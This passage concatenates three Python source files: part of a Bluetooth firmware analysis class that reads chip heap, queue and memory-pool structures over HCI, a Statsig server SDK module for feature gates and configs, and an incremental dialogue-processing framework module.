# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0x0F:
if u16(hcipkt.data[2:4]) == 0x0405: # Create Connection HCI Cmd
log.info("[Connection Create initiated]")
return
# Check if event is Connection Create Complete Event
if hcipkt.event_code == 0x03:
status = hcipkt.data[0]
status_str = (
hex(status)
if status not in hcipkt.HCI_COMMAND_ERROR_STR
else hcipkt.HCI_COMMAND_ERROR_STR[status]
)
conn_handle = u16(hcipkt.data[1:3])
btaddr = hcipkt.data[3:9][::-1]
#btaddr_str = ":".join([b.encode("hex") for b in btaddr])
btaddr_str = bytes_to_hex(btaddr)
log.info(
"[Connect Complete: Handle=0x%x Address=%s status=%s]"
% (conn_handle, btaddr_str, status_str)
)
# Also show Disconnect Complete
if hcipkt.event_code == 0x05:
conn_handle = u16(hcipkt.data[1:3])
log.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
# Command complete event with stats
if hcipkt.event_code == 0x0E:
if u16(hcipkt.data[1:3]) == 0xFC90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject = u32(hcipkt.data[8:12])
ratio = 0
if coex_grant > 0:
ratio = coex_reject / float(coex_grant)
log.info(
"[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]"
% (coex_grant, coex_reject, ratio)
)
return
def readHeapInformation(self):
# type: () -> Optional[Union[List[HeapInformation], bool]]
"""
Traverses the double-linked list of BLOC structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the BLOC struct inside the double-linked list
- address: Address of the BLOC struct
- list_length: Number of available buffers currently in the list
- capacity: Total number of buffers belonging to the struct
- buffer_list: Head of the buffer list (single-linked list)
- memory: Address of the backing buffer in memory
- memory_size: Size of the backing buffer in memory
- buffer_size: Size of a single buffer in the list
- thread_waitlist: Head of the list of threads, that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous BLOC struct (double-linked list)
- next: Next BLOC struct (double-linked list)
- buffer_headers: Dictionoary containing buffer headers (e.g. free linked list)
"""
# Check if constants are defined in fw.py
for const in ["BLOC_HEAD"]:
if const not in dir(self.fw):
log.warn(
"readHeapInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
# Read address of first bloc struct:
first_bloc_struct_address = Address(u32(self.readMem(self.fw.BLOC_HEAD, 4)))
# Traverse the double-linked list
bloclist = []
current_bloc_struct_address = first_bloc_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
# Parsing BLOC struct
bloc_struct = self.readMem(current_bloc_struct_address, 0x30)
# New Bloc Struct since ~2014
if "BLOC_NG" in dir(self.fw):
bloc_fields = struct.unpack("IHBBIIBB", bloc_struct[:18])
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["next"] = bloc_fields[0]
current_element["buffer_size"] = bloc_fields[1]
current_element["capacity"] = bloc_fields[2]
current_element["memory"] = bloc_fields[4]
current_element["buffer_list"] = bloc_fields[5]
current_element["list_length"] = bloc_fields[6]
current_element["memory_size"] = current_element["capacity"] * (
4 + current_element["buffer_size"]
)
# current_element["memory_size"] = bloc_fields[6]
# current_element["thread_waitlist"] = bloc_fields[8]
# current_element["waitlist_length"] = bloc_fields[9]
# current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Old BLOC Struct
else:
bloc_fields = struct.unpack("I" * 12, bloc_struct)
if bloc_fields[0] != u32(b"COLB"):
log.warn(
"readHeapInformation: BLOC double-linked list contains non-BLOC element. abort."
)
return None
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["list_length"] = bloc_fields[2]
current_element["capacity"] = bloc_fields[3]
current_element["buffer_list"] = bloc_fields[4]
current_element["memory"] = bloc_fields[5]
current_element["memory_size"] = bloc_fields[6]
current_element["buffer_size"] = bloc_fields[7]
current_element["thread_waitlist"] = bloc_fields[8]
current_element["waitlist_length"] = bloc_fields[9]
current_element["next"] = bloc_fields[10]
current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Parsing buffer headers
buffer_size = current_element["buffer_size"] + 4
for buf_index in range(current_element["capacity"]):
buffer_address = current_element["memory"] + buf_index * buffer_size
hdr = u32(self.readMem(buffer_address, 4))
current_element["buffer_headers"][buffer_address] = hdr
# Append and iterate
bloclist.append(current_element)
current_bloc_struct_address = current_element["next"]
if (
current_bloc_struct_address == first_bloc_struct_address
or current_bloc_struct_address == 0
):
break
return bloclist
def readMemoryPoolStatisticsCallback(self, record):
# type: (Record) -> Optional[Union[List[MemoryPool], bool]]
"""
The chip can be put into a mode that enables displaying
memory pool statistics each second with the HCI command
0xfd1c (VSC DBFW) 0x50 (Read Memory Pool Statistics).
Extracted the info about this from a Mojave PacketLogger,
saw it once on an iPhone XS (Aladdin) in action and then
tested it on a Samsung Galaxy S10e and it works.
In contrast to the readHeapInformation command, this does
not manually traverse and check the heap. This means that
this variant is faster but cannot perform checks for
heap corruptions.
TODO: There might be more subcommands, maybe also check out
0x51 (Logging over PCIe) and 0x02 (Write Trace Config).
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0xFF and hcipkt.data[0:2] == b'\x1b\x08': # Dump Type 8
log.debug("[MemPool Statistics Received]")
# Pool Meta Information
pool_meta = struct.unpack("<HIIII", hcipkt.data[3:21])
meta_info = {}
meta_info["hci_count"] = pool_meta[0] # Dumped HCI Packet Count
meta_info["free_min"] = pool_meta[1] # Free Memory Min Address
meta_info["free_max"] = pool_meta[2] # Free Memory Max Address Plus One
meta_info["time"] = pool_meta[3] # Timestamp
meta_info["rfu"] = pool_meta[4] # RFU
log.debug(meta_info)
# Individual Pool Information
pool_list = []
pool_len = hcipkt.data[2] # Number of Pools
for index in range(pool_len):
pool_fields = struct.unpack("<IIIHHHHHH", hcipkt.data[21+(index*24):21+((index+1)*24)])
current_element = {}
current_element["index"] = index
current_element["base"] = pool_fields[0] # Base
current_element["first"] = pool_fields[1] # First Free
current_element["name"] = pool_fields[2].to_bytes(4, byteorder='little').decode('utf-8') # Name
current_element["size"] = pool_fields[3] # Block Size
current_element["count"] = pool_fields[4] # Block Count
current_element["low"] = pool_fields[5] # Low Watermark
current_element["allocated"] = pool_fields[6] # Allocated Blocks
current_element["free"] = pool_fields[7] # Free Blocks
current_element["die"] = pool_fields[8] # Die Reserve Count
log.debug(current_element)
pool_list.append(current_element)
# We're called asynchronous so we can return but printing in the
# command line does not really make sense.
log.info((
"\n> Pools at {time}, Min Addr 0x{free_min:06X}, "
"Max Addr 0x{free_max:06X}"
).format(**meta_info))
log.info(" Name @ Base: Size Alloc / Cnt 1st Free Low Die ")
log.info(" ----------------------------------------------------------")
for pool in pool_list:
log.info((
" {name} @ 0x{base:06X}: {size:6d}"
" {allocated:3d} / {count:3d} "
"0x{first:06X} {low:3d} {die:3d}"
).format(**pool))
return pool_list
return
def readQueueInformation(self):
# type: () -> Optional[List[QueueElement]]
"""
Traverses the double-linked list of QUEUE structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the BLOC struct inside the double-linked list
- address: Address of the BLOC struct
- item_size: Size of a single queue item (in Byte)
- capacity: Total number of queue items belonging to the struct
- available_items: Number of valid queue items ready to be retrieved
- free_slots: Number of free item slots
- queue_buf_start: Pointer to the beginning of the queue buffer
- queue_buf_end: Pointer to the end of the queue buffer
- next_item: Pointer to the next item to be retrieved from the queue
- next_free_slot: Pointer to the next free item slot to be filled
- thread_waitlist: Head of the list of threads, that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous BLOC struct (double-linked list)
- next: Next BLOC struct (double-linked list)
- items: List of queue items (raw bytes)
- name: Name of the queue (from reverse engineering its usage)
"""
# Check if constants are defined in fw.py
for const in ["QUEUE_HEAD"]:
if const not in dir(self.fw):
log.warn(
"readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return None
# Read address of first queue struct:
first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))
# Traverse the double-linked list
queuelist = []
current_queue_struct_address = first_queue_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
queue_struct = self.readMem(current_queue_struct_address, 0x38)
queue_fields = struct.unpack("I" * 14, queue_struct)
if queue_fields[0] != u32(b"UEUQ"):
log.warn(
"readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort."
)
return None
current_element = QueueElement(
index,
current_queue_struct_address,
queue_fields[2] * 4,
queue_fields[3],
queue_fields[4],
queue_fields[5],
queue_fields[6],
queue_fields[7],
queue_fields[8],
queue_fields[9],
queue_fields[10],
queue_fields[11],
queue_fields[12],
queue_fields[13],
self.fw.QUEUE_NAMES[index],
)
queuelist.append(current_element)
current_queue_struct_address = current_element["next"]
if current_queue_struct_address == first_queue_struct_address:
break
return queuelist
def enableBroadcomDiagnosticLogging(self, enable):
# type: (bool) -> None
"""
Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
messages like HCI commands, SCO and ACL data, and HCI events. Their types are
0x01-0x04. Broadcoms proprietary message type is 0x07 to handle diagnostic
messages.
Diagnostic logging sets a variable checked for any LMP/LCP message when
sending and receiving and then forwarding its contents prepended with 0x07.
In principle, diagnostic logging can be enabled on Android by directly
writing to the serial Bluetooth device:
echo -ne '\x07\xf0\x01' >/dev/ttyHS
However, Androids Bluetooth driver is not properly parsing message type 0x07.
This causes the driver to crash when enabling diagnostics like this. A
custom Bluetooth driver is required, which accepts diagnostic commands
and also forwards diagnostic message outputs to the BT Snoop Log.
"""
if not self.serial:
self.sendH4(hci.HCI.BCM_DIAG, b"\xf0" + b"\x01" if enable else b"\x00")
# We can send the activation to the serial, but then the Android driver
# itself crashes when receiving diagnostic frames...
else:
log.warn("Diagnostic protocol requires modified Android driver!")
def enableEnhancedAdvReport(self):
# type: () -> bool
"""
Broadcom and Cypress chips can extend the "Event Type" field in LE Advertising
Reports with information on the channel, antenna, and scan mode.
Parsing this enhanced advertisement report is "documented" in the PacketDecoder
binary of Apple's PacketLogger, which is part of the Additional Tools for XCode.
The function parsing these is called `leAdvertisingEventTypeString` (XCode 11.4).
Usually, the Event Type field is set to 0x00-0x04, meaning ADV_IND..SCAN_RSP.
Additional fields:
channel = (event_type >> 4) & 7
antenna = event_type & 0x80
scan_mode = (event_type >> 3) & 3
The channel is a value 0--2, which corresponds to 37--39.
The antenna is 0 for BT and 1 for WLAN.
No idea about the scan mode ;)
The Broadcom and Cypress firmware sets these additional fields when the firmware
flag `bEnhancedAdvReport` is set. We do not know how to set it via VSC HCI and if that
is possible, so we set it by directly writing to RAM.
TODO: Also implement for the MacBook 2016, it's at 0x2037D0, but we don't know
the current LMP version, as it changes with each macOS patch level.
Won't Fix:
* The Nexus 5 BLE implementation is too old, `lculp_HandleScanReport` (0x184D0) and
`_scanTaskRxHeaderDone` (0x16E74) do not reference this flag yet.
* Also seems to be missing in the Nexus 6P/Samsung Galaxy S6 but didn't check as careful.
Returns true if the feature is supported and could be enabled.
"""
# Check if constants are defined in fw.py
if "ENHANCED_ADV_REPORT_ADDRESS" not in dir(self.fw):
log.warn(
"enableEnhancedAdvReport: 'ENHANCED_ADV_REPORT_ADDRESS' not in fw.py. FEATURE NOT SUPPORTED!"
)
return False
self.writeMem(self.fw.ENHANCED_ADV_REPORT_ADDRESS, b'\x01\x00\x00\x00')
def _setupSockets(self):
raise NotImplementedError()
def _teardownSockets(self):
raise NotImplementedError()
|
statsig_server.py | import asyncio
import threading
from .evaluator import _ConfigEvaluation, _Evaluator
from .statsig_network import _StatsigNetwork
from .statsig_logger import _StatsigLogger
from .dynamic_config import DynamicConfig
from .statsig_options import StatsigOptions
from .version import __version__
RULESETS_SYNC_INTERVAL = 10
IDLISTS_SYNC_INTERVAL = 60
class StatsigServer:
def initialize(self, sdkKey: str, options=None):
if sdkKey is None or not sdkKey.startswith("secret-"):
raise ValueError(
'Invalid key provided. You must use a Server Secret Key from the Statsig console.')
if options is None:
options = StatsigOptions()
self._options = options
self.__shutdown_event = threading.Event()
self.__statsig_metadata = {
"sdkVersion": __version__,
"sdkType": "py-server"
}
self._network = _StatsigNetwork(sdkKey, options)
self._logger = _StatsigLogger(self._network, self.__shutdown_event, self.__statsig_metadata, options.local_mode)
self._evaluator = _Evaluator()
self._last_update_time = 0
if not options.local_mode:
self._download_config_specs()
self.__background_download_configs = threading.Thread(
target=self._sync, args=(self._download_config_specs, options.rulesets_sync_interval or RULESETS_SYNC_INTERVAL,))
self.__background_download_configs.daemon = True
self.__background_download_configs.start()
if not options.local_mode:
self._download_id_lists()
self.__background_download_idlists = threading.Thread(
target=self._sync, args=(self._download_id_lists, options.idlists_sync_interval or IDLISTS_SYNC_INTERVAL,))
self.__background_download_idlists.daemon = True
self.__background_download_idlists.start()
self._initialized = True
def check_gate(self, user:object, gate_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not gate_name:
return False
result = self.__check_gate_server_fallback(user, gate_name)
return result.boolean_value
def get_config(self, user:object, config_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not config_name:
return DynamicConfig({})
result = self.__get_config_server_fallback(user, config_name)
return DynamicConfig(result.json_value, config_name, result.rule_id)
def get_experiment(self, user:object, experiment_name:str):
return self.get_config(user, experiment_name)
def log_event(self, event:object):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
event.user = self.__normalize_user(event.user)
self._logger.log(event)
def shutdown(self):
self.__shutdown_event.set()
self._logger.shutdown()
if not self._options.local_mode:
self.__background_download_configs.join()
self.__background_download_idlists.join()
def override_gate(self, gate:str, value:bool, user_id:str = None):
self._evaluator.override_gate(gate, value, user_id)
def override_config(self, config:str, value:object, user_id:str = None):
self._evaluator.override_config(config, value, user_id)
def override_experiment(self, experiment:str, value:object, user_id:str = None):
self._evaluator.override_config(experiment, value, user_id)
def evaluate_all(self, user:object):
all_gates = dict()
for gate in self._evaluator.get_all_gates():
result = self.__check_gate_server_fallback(user, gate, False)
all_gates[gate] = {
"value": result.boolean_value,
"rule_id": result.rule_id
}
all_configs = dict()
for config in self._evaluator.get_all_configs():
result = self.__get_config_server_fallback(user, config, False)
all_configs[config] = {
"value": result.json_value,
"rule_id": result.rule_id
}
return dict({
"feature_gates": all_gates,
"dynamic_configs": all_configs
})
def __check_gate_server_fallback(self, user:object, gate_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.check_gate(user, gate_name)
if result.fetch_from_server:
network_gate = self._network.post_request("check_gate", {
"gateName": gate_name,
"user": user.to_dict(True),
"statsigMetadata": self.__statsig_metadata,
})
if network_gate is None:
return _ConfigEvaluation()
return _ConfigEvaluation(boolean_value=network_gate.get("value"), rule_id=network_gate.get("rule_id"))
elif log_exposure:
self._logger.log_gate_exposure(
user, gate_name, result.boolean_value, result.rule_id, result.secondary_exposures)
return result
def __get_config_server_fallback(self, user:object, config_name:str, log_exposure=True):
user = self.__normalize_user(user)
result = self._evaluator.get_config(user, config_name)
if result.fetch_from_server:
network_config = self._network.post_request("get_config", {
"configName": config_name,
"user": user,
"statsigMetadata": self.__statsig_metadata,
})
if network_config is None:
return _ConfigEvaluation()
return _ConfigEvaluation(json_value=network_config.get("value", {}), rule_id=network_config.get("ruleID", ""))
elif log_exposure:
self._logger.log_config_exposure(
user, config_name, result.rule_id, result.secondary_exposures)
return result
def __normalize_user(self, user):
if self._options is not None and self._options._environment is not None:
user._statsig_environment = self._options._environment
return user
def _sync(self, sync_func, interval):
while True:
if self.__shutdown_event.wait(interval):
break
sync_func()
def _download_config_specs(self):
specs = self._network.post_request("download_config_specs", {
"statsigMetadata": self.__statsig_metadata,
"sinceTime": self._last_update_time,
})
if specs is None:
return
time = specs.get("time")
if time is not None:
self._last_update_time = time
if specs.get("has_updates", False):
self._evaluator.setDownloadedConfigs(specs)
def _download_id_list(self, list_name, list):
res = self._network.post_request("download_id_list", {
"listName": list_name,
"statsigMetadata": self.__statsig_metadata,
"sinceTime": list.get("time", 0),
})
if res is None:
return
ids = list.get("ids", dict())
for id in res.get("add_ids", []):
ids[id] = True
for id in res.get("remove_ids", []):
del ids[id]
new_time = res.get("time", 0)
if new_time > list.get("time", 0):
list["time"] = new_time
def _download_id_lists(self):
thread_pool = []
id_lists = self._evaluator.getIDLists()
for list_name, list in id_lists.items():
thread = threading.Thread(
target=self._download_id_list, args=(list_name, list, ))
thread.daemon = True
thread_pool.append(thread)
thread.start()
for thread in thread_pool:
thread.join()
|
abstract.py | """
Abstract Module
===============
This module defines the abstract classes used by the incremental modules.
The AbstractModules defines some methods that handle the general tasks of a
module (like the handling of Queues).
The IncrementalQueue defines the basic functionality of an incremental queue
like appending an IU to the queue and letting modules subscribe to the Queue.
The Incremental Unit provides the basic data structure to exchange information
between modules.
"""
import queue
import threading
import time
import enum
import copy
class UpdateType(enum.Enum):
"""The update type enum that defines all the types with which the incremental units
can be transmitted. Per default, the UpdateMessge class checks that the update type
is one of the types listed in this enum. However, the strict type checking can be
disabled and any update type may be used."""
ADD = "add"
UPDATE = "update"
REVOKE = "revoke"
COMMIT = "commit"
class IncrementalQueue(queue.Queue):
"""An abstract incremental queue.
A module may subscribe to a queue of another module. Every time a new
incremental unit (IU) is produced, the IU is put into a special queue for
every subscriber to the incremental queue. Every unit gets its own queue and
may process the items at different speeds.
Attributes:
provider (AbstractModule): The module that provides IUs for this queue.
consumer (AbstractModule): The module that consumes IUs for this queue.
maxsize (int): The maximum size of the queue, where 0 does not restrict
the size.
"""
def __init__(self, provider, consumer, maxsize=0):
super().__init__(maxsize=maxsize)
self.provider = provider
self.consumer = consumer
def remove(self):
"""Removes the queue from the consumer and the producer."""
self.provider.remove_right_buffer(self)
self.consumer.remove_left_buffer(self)
class IncrementalUnit:
"""An abstract incremental unit.
The IU may be used for ASR, NLU, DM, TT, TTS, ... It can be redefined to fit
the needs of the different module (and module-types) but should always
provide these functionalities.
The meta_data may be used when an incremental module is having additional
information because it is working in a simulated environemnt. This data can
be used by later modules to keep the simulation going.
Attributes:
creator (AbstractModule): The module that created this IU
previous_iu (IncrementalUnit): A link to the IU created before the
current one.
grounded_in (IncrementalUnit): A link to the IU this IU is based on.
created_at (float): The UNIX timestamp of the moment the IU is created.
meta_data (dict): Meta data that offers optional meta information. This
field can be used to add information that is not available for all
uses of the specific incremental unit.
"""
MAX_DEPTH = 50
"""Maximum depth of the previous_iu and grounded_in connections."""
def __init__(
self,
creator=None,
iuid=0,
previous_iu=None,
grounded_in=None,
payload=None,
**kwargs
):
"""Initialize an abstract IU. Takes the module that created the IU as an
argument.
Args:
creator (AbstractModule): The module that created this incremental
unit.
iuid (int): The id of the IU. This should be a unique ID given by the module
that produces the incremental unit and is used to identify the IU later
on - for example when revoking an IU.
previous_iu (IncrementalUnit): A link to the incremental unit
created before the current one by the same module.
grounded_in (IncrementalUnit): A link to the incremental unit that
this one is based on.
payload: A generic payload that can be set.
"""
self.creator = creator
self.iuid = iuid
self.previous_iu = previous_iu
self.grounded_in = grounded_in
self._processed_list = []
self.payload = payload
self.mutex = threading.Lock()
self.committed = False
self.revoked = False
self.meta_data = {}
if grounded_in:
self.meta_data = {**grounded_in.meta_data}
self.created_at = time.time()
self._remove_old_links()
def _remove_old_links(self):
current_depth = 0
previous_iu = self.previous_iu
while previous_iu:
if current_depth == self.MAX_DEPTH:
previous_iu.previous_iu = None
previous_iu = previous_iu.previous_iu
current_depth += 1
current_depth = 0
grounded_in = self.grounded_in
while grounded_in:
if current_depth == self.MAX_DEPTH:
grounded_in.grounded_in = None
grounded_in = grounded_in.grounded_in
current_depth += 1
def age(self):
"""Returns the age of the IU in seconds.
Returns:
float: The age of the IU in seconds
"""
return time.time() - self.created_at
def older_than(self, s):
"""Return whether the IU is older than s seconds.
Args:
s (float): The time in seconds to check against.
Returns:
bool: Whether or not the age of the IU exceeds s seconds.
"""
return self.age() > s
def processed_list(self):
"""Return a list of all modules that have already processed this IU.
The returned list is a copy of the list held by the IU.
Returns:
list: A list of all modules that have alread processed this IU.
"""
with self.mutex:
return list(self._processed_list)
def set_processed(self, module):
"""Add the module to the list of modules that have already processed
this IU.
Args:
module (AbstractModule): The module that has processed this IU.
"""
if not isinstance(module, AbstractModule):
raise TypeError("Given object is not a module!")
with self.mutex:
self._processed_list.append(module)
def is_processed_by(self, module):
"""Return True if the IU is processed by the given module.
If the given object is a module that has not processed this IU or is not
a module it returns False.
Args:
module (AbstractModule): The module to test whether or not it has
processed the IU
Returns:
bool: Whether or not the module has processed the IU.
"""
with self.mutex:
return module in self._processed_list
def __repr__(self):
return "%s - (%s): %s" % (
self.type(),
self.creator.name(),
str(self.payload)[0:10],
)
@staticmethod
def type():
"""Return the type of the IU in a human-readable format.
Returns:
str: The type of the IU in a human-readable format.
"""
raise NotImplementedError()
class UpdateMessage:
"""A class that encapsulates multiple incremental units and their update type. The
update types can be any of the ones defined in the enum UpdateType"""
def __init__(self):
"""Initializes the update message with no IU added.
To initialize with a single IU use the classmethod "from_iu" or for a list of
IUs use the classmethod "from_ius".
"""
self._msgs = [] # First element of tuple is IU, second is UpdateType
self._counter = -1
def __len__(self):
return len(self._msgs)
@classmethod
def from_iu(cls, iu, update_type):
"""Initializes the update message with an initial pair of incremental unit and
update type.
Args:
iu (IncrementalUnit): The first incremental unit of the update message
update_type (UpdateType): The update type of the incremental unit.
"""
um = UpdateMessage()
um.add_iu(iu, update_type)
return um
@classmethod
def from_iu_list(cls, self, iu_list):
"""Initializes the update message with a list of tuples containing the update
type and incremental units in the format (IncrementalUnit, UpdateType)
Args:
iu_list (list): A list of IncrementalUnit-UpdateType-tuples in the format
(IncrementalUnit, UpdateType) that will be added to the update message.
"""
um = UpdateMessage()
um.add_ius(iu_list)
return um
def __iter__(self):
return self
def __next__(self):
self._counter += 1
if self._counter == len(self._msgs):
self._counter = -1
raise StopIteration
return self._msgs[self._counter]
def add_iu(self, iu, update_type, strict_update_type=True):
"""Adds an incremental unit to the update message with the given update type.
If a single UpdateType-IncrementalUnit-Tuple raises a TypeError or a ValueError,
none of the units will be added to the update message.
Args:
iu (IncrementalUnit): The incremental unit to be added to the update message
update_type (UpdateType): The type of the update the should be associated
with the incremental unit.
strict_update_type (bool): Whether the update type should be checked and
converted to type UpdateType. If the given argument is not of type
UpdateType or a str that can be converted to UpdateType, a ValueError
is raised.
Raises:
TypeError: When the given incremental unit is not of type IncrementalUnit
or if the update_type does not correspond to an update type.
ValueError: When the given udpate type is not a valid update type or the
given argument cannot be converted to an UpdateType. Only applies if the
strict_update_type flag is set.
"""
if not isinstance(iu, IncrementalUnit):
raise TypeError("IU is of type %s but should be IncrementalUnit" % type(iu))
if strict_update_type and not isinstance(update_type, UpdateType):
update_type = UpdateType(update_type)
self._msgs.append((iu, update_type))
def add_ius(self, iu_list, strict_update_type=True):
"""Adds a list of incremental units and according update types to the update
message.
Args:
iu_list (list): A list containing tuples of update types and incremental
units in the format (IncrementalUnit, UpdateType).
strict_update_type (bool): Whether the update type should be checked and
converted to type UpdateType. If the given argument is not of type
UpdateType or a str that can be converted to UpdateType, a ValueError
is raised.
Raises:
TypeError: When the given incremental unit is not of type IncrementalUnit
or if the update_type does not correspond to an update type.
ValueError: When the given udpate type is not a valid update type or the
given argument cannot be converted to an UpdateType. Only applies if the
strict_update_type flag is set.
"""
for update_type, iu in iu_list:
if not isinstance(iu, IncrementalUnit):
raise TypeError(
"IU is of type %s but should be IncrementalUnit" % type(iu)
)
if strict_update_type and not isinstance(update_type, UpdateType):
UpdateType(update_type)
for update_type, iu in iu_list:
if strict_update_type and not isinstance(update_type, UpdateType):
update_type = UpdateType(update_type)
self._msgs.append((iu, update_type))
def has_valid_ius(self, iu_classes):
"""Checks whether the IUs in this update message are all of the type provided in
the ius argument.
Args:
iu_classes (list or class): A list of incremental unit classes or a
single incremental unit class that should be checked against.
Returns:
bool: Returns true if all the incremental unit in the udpate message are
instances of the iu_classes given in the parameter.
"""
if iu_classes is None:
return False
if not isinstance(iu_classes, list):
iu_classes = [iu_classes]
for iu in self.incremental_units():
if not isinstance(iu, tuple(iu_classes)):
return False
return True
def update_types(self):
"""A generator that iterates of all the update types of the update message,
ignoring the incemental units
"""
for _, ut in self._msgs:
yield ut
def incremental_units(self):
"""A generator that iterates of all the incremental units of the update message,
ignoring the update types.
"""
for iu, _ in self._msgs:
yield iu
def set_processed(self, module):
"""Sets all the incremental units of the update message as processed by the
module that is given
Args:
module (IncrementalModule): The module that has processed the incremental
units of this update message."""
for iu in self.incremental_units():
iu.set_processed(module)
class AbstractModule:
"""An abstract module that is able to incrementally process data."""
EVENT_PROCESS_IU = "process_iu"
EVENT_PROCESS_UPDATE_MESSAGE = "process_update_message"
EVENT_SUBSCRIBE = "subscribe"
EVENT_START = "start"
EVENT_STOP = "stop"
QUEUE_TIMEOUT = 0.01
"""Timeout in seconds for the incremental queues as not to block processing."""
@staticmethod
def name():
"""Return the human-readable name of the module.
Returns:
str: A string containing the name of the module
"""
raise NotImplementedError()
@staticmethod
def description():
"""Return the human-readable description of the module.
Returns:
str: A string containing the description of the module
"""
raise NotImplementedError()
@staticmethod
def input_ius():
"""Return the list of IU classes that may be processed by this module.
If an IU is passed to the module that is not in this list or a subclass
of this list, an error is thrown when trying to process that IU.
Returns:
list: A list of classes that this module is able to process.
"""
raise NotImplementedError()
@staticmethod
def output_iu():
"""Return the class of IU that this module is producing.
Returns:
class: The class of IU this module is producing.
"""
raise NotImplementedError()
def get_init_arguments(self):
"""Returns the arguments of the init function to create the current
instance of the Module.
Returns:
dict: A dictionary containing all the necessary arguments to create
the current instance of the module.
"""
d = {}
valid_types = (int, float, bool, str, dict) # Only serializable types.
for k, v in self.__dict__.items():
if isinstance(v, valid_types):
d[k] = v
return d
def __init__(self, queue_class=IncrementalQueue, meta_data={}, **kwargs):
"""Initialize the module with a default IncrementalQueue.
Args:
queue_class (IncrementalQueue): A queue class that should be used
instead of the standard queue class. If the given object does
not inherit from IncrementalQueue, the standard IncrementalQueue
is used.
meta_data (dict): A dict with meta data about the module. This may
be coordinates of the visualization of this module or other
auxiliary information.
"""
self._right_buffers = []
self.is_running = False
self._previous_iu = None
self._left_buffers = []
self.mutex = threading.Lock()
self.events = {}
self.current_ius = []
self.meta_data = {}
if meta_data:
self.meta_data = meta_data
self.queue_class = IncrementalQueue
if issubclass(queue_class, IncrementalQueue):
self.queue_class = queue_class
self.iu_counter = 0
def revoke(self, iu, remove_revoked=True):
"""Revokes an IU form the list of the current_ius.
Args:
iu (IncrmentalUnit or list): The incremental unit or a list of incremental
units to revoke.
remove_revoked (bool): Whether the revoked incremental unit should be
deleted from the current_ius list or if only the revoked flag should
be set.
"""
if isinstance(iu, IncrementalUnit):
iu = [iu]
new_iu_list = []
for ciu in self.current_ius:
flag = False
for a in iu:
if ciu.iuid == a.iuid:
ciu.revoked = True
flag = True
break
if not flag:
new_iu_list.append(ciu)
if remove_revoked:
self.current_ius = new_iu_list
def commit(self, iu):
"""Sets one or multiple IUs as commited from the list of the current_ius.
Args:
iu (IncrementalUnit or list): The incrementall unit or list of incremental
to set as committed.
"""
if isinstance(iu, IncrementalUnit):
iu = [iu]
for ciu in self.current_ius:
for i in iu:
if ciu.iuid == i.iuid:
ciu.committed = True
break
def add_left_buffer(self, left_buffer):
"""Add a new left buffer for the module.
This method stops the execution of the module pipeline if it is running.
Args:
left_buffer (IncrementalQueue): The left buffer to add to the
module.
"""
if not left_buffer or not isinstance(left_buffer, IncrementalQueue):
return
if self.is_running:
self.stop()
self._left_buffers.append(left_buffer)
def remove_left_buffer(self, left_buffer):
"""Remove a left buffer from the module.
This method stops the execution of the module pipeline if it is running.
Args:
left_buffer (IncrementalQueue): The left buffer to remove from the
module.
"""
if self.is_running:
self.stop()
self._left_buffers.remove(left_buffer)
def left_buffers(self):
"""Returns the list of left buffers of the module.
Returns:
list: The left buffers of the module.
"""
return list(self._left_buffers)
def add_right_buffer(self, right_buffer):
"""Add a new right buffer for the module.
This method stops the execution of the module pipeline if it is running.
Args:
right_buffer (IncrementalQueue): The right buffer to add to the
module.
"""
if not right_buffer or not isinstance(right_buffer, IncrementalQueue):
return
if self.is_running:
self.stop()
self._right_buffers.append(right_buffer)
def remove_right_buffer(self, right_buffer):
"""Remove a right buffer from the module.
This method stops the execution of the module pipeline if it is running.
Args:
right_buffer (IncrementalQueue): The right buffer to remove from the
module.
"""
if self.is_running:
self.stop()
self._right_buffers.remove(right_buffer)
def right_buffers(self):
"""Return the right buffers of the module.
Note that the returned list is only a shallow copy. Modifying the list
does not alter the internal state of the module (but modifying the
queues in that list does).
Returns:
list: A list of the right buffers, each queue corresponding to an
input of another module.
"""
return list(self._right_buffers)
def append(self, update_message):
